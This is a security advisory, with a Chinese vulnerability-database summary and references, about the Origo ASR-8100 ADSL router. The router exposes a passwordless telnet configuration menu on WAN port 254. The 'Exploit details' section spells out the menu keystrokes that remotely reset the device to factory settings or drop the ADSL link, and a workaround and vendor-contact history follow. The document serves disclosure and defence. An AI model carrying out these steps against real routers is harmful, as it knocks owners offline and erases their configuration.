https://cxsecurity.com/issue/WLB-2007100121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-460

OrigoADSL是一款宽带路由器。OrigoADSL由于缺少充分的访问控制，远程攻击者可以未授权访问路由器，会导致拒绝服务。OrigoADSL包含基于telnet的配置接口在WAN接口，监听254端口，并且没有设置任何密码验证，任意攻击者可以连接这个端口重设设备配置，可产生拒绝服务。

Vulnerable device
-----------------

Origo ASR-8100 ADSL router
Firmware ETHADSL_USB_110502_REL10_S
Customer Software Version 110502_REL10_S
ADSL Showtime Firmware Version: 3.21
device based on Conexant CX82310-14 chipset

Vulnerability: Remote ADSL reset and permanent denial of service attack
-----------------------------------------------------------------------

The following device is able to be remotely reset to factory settings,
allowing a permanent denial of service attack until reconfigured manually by
an operator.  The attack only takes place after the device is reset - which
may be some time after it has been performed.  PPP authentication
information
is lost on reset to factory settings, so it is most likely that the device
will be unable to establish a WAN link after reset.

The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
is used) its IP address to be changed.

Attack overview
---------------

A telnet-style configuration interface is left open to WAN interface on port
254, without a password being set.  This menu system is very easily driven
by
a remote attacker.

A full exploit is given below.

Workaround
----------

Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.

With the web configuration interface at http://router-ip/doc/advance.htm
click on Configuration: Virtual server
Enter a new entry:
Public port: 254
Private port: 9876
TCP
Host IP address: 127.0.0.1
Click 'Add this setting', then do Configuration: Save Settings/Reboot and
click 'Save & Reboot'

Exploit details
---------------

From any Internet connected host:

telnet <router global IP address> 254
Returns a menu:
01/01/99                   CONEXANT SYSTEMS, INC. 
00:04:10
                ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21          
                   
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
  1. SYSTEM STATUS AND CONFIGURATION
  2. ADSL MENU
  
  4. REMOTE LOGON
  
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
  1. SYSTEM INFORMATION
  2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
  1. CHANGE SYSTEM TIME
  2. CHANGE SYSTEM DATE
  3. CHANGE PASSWORD
  4. FACTORY DEFAULT CONFIGURATION

Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't seem to work)

Type 4:  Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)

Type Y:  Message: NVRAM updated

This does not reset the ADSL modem, only clears the NVRAM.  This takes
effect
the next time the modem is reset: the admin password is reset to that
printed
in the documentation, and the ADSL username/password are reset, meaning the
connection is down permanently until a human sets them up again.  Any other
settings (security etc) are also lost.

From main menu, type 2 to get to ADSL MENU
  1. ADSL PERFORMANCE STATUS
  2. 24 HOUR ADSL PERFORMANCE HISTORY
  3. 7 DAY ADSL PERFORMANCE HISTORY
  4. ADSL ALARM HISTORY
  5. ADSL TRANSCEIVER CONFIGURATION MENU
  6. ADSL LINK RESET

Type 6:  Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y.  The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).

Vendor notification
-------------------

UK support for Vendor (support (at) adsltech (dot) com [email concealed]) was notified on 30th August
2003 - entirety of reply message was 'Thanks a lot'.  Vendor doesn't
advertise an email address so were notified via web form on that date - no
response received.  To date the vendor has not advertised any patches or new
firmware.

-- 
Theo Markettos                 theo (at) markettos.org (dot) uk [email concealed]
Clare Hall, Cambridge          theom (at) chiark.greenend.org (dot) uk [email concealed]
CB3 9AL, UK                    http://www.markettos.org.uk/

来源:XF
名称:origo-default-settings-restore(13463)
链接:http://xforce.iss.net/xforce/xfdb/13463
来源:BID
名称:8855
链接:http://www.securityfocus.com/bid/8855
来源:BUGTRAQ
名称:20031012OrigoASR-8100ADSLrouterremotefactoryreset
链接:http://www.securityfocus.com/archive/1/341752
来源:SREASON
名称:3300
链接:http://securityreason.com/securityalert/3300
来源：NSFOCUS
名称：5569
链接：http://www.nsfocus.net/vulndb/5569